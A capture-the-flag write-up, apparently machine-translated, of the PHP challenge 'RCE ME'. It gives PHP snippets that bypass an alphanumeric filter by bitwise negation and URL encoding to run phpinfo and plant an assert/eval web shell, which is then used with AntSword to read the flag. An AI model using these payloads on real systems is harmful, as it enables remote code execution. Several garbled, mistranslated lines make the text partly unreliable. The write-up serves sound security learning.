[ Geek challenge 2019]RCE ME 1

First open the topic and get ：

Discovery is code auditing

Incoming code Not greater than 40

And it can't contain a To z Upper and lower case characters and 1 To 10 The number of

We can bypass by characters that are not in this character set

You can use XOR and negation

Here I use negation , Bypass

perform phpinfo();

playload:

<?php

$c='phpinfo';
$d=urlencode(~$c);
echo $d;
?>

perform ：

It is found that some row numbers are controlled ：

Write a sentence ：

<?php
error_reporting(0);
$a='assert';
$b=urlencode(~$a);
echo '(~'.$b.')';
$c='(eval($_POST[1]))';
$d=urlencode(~$c);
echo '(~'.$d.')';
?>

ad locum , We can't use... Directly eval because eval Not at all php function So we can't call through the method of variable function .
ad locum , We use assert To construct the , But because of php Version of the problem , We can't directly construct <?php assert(${}_{P}OST{[}^{\prime }{a}^{\prime }]);>,IPeopleNeed\; to\; bewanttransferuseevalSpell\; itPick\; upbyassert（eval($_POST[test])）

Connect... With an ant sword

But the command cannot be executed , and cat flag

Use the plug-in of ant sword bypass:

Click start to enter ：

utilize readflag obtain flag:

Reference blog ：

https://blog.csdn.net/m0_62879498/article/details/124803318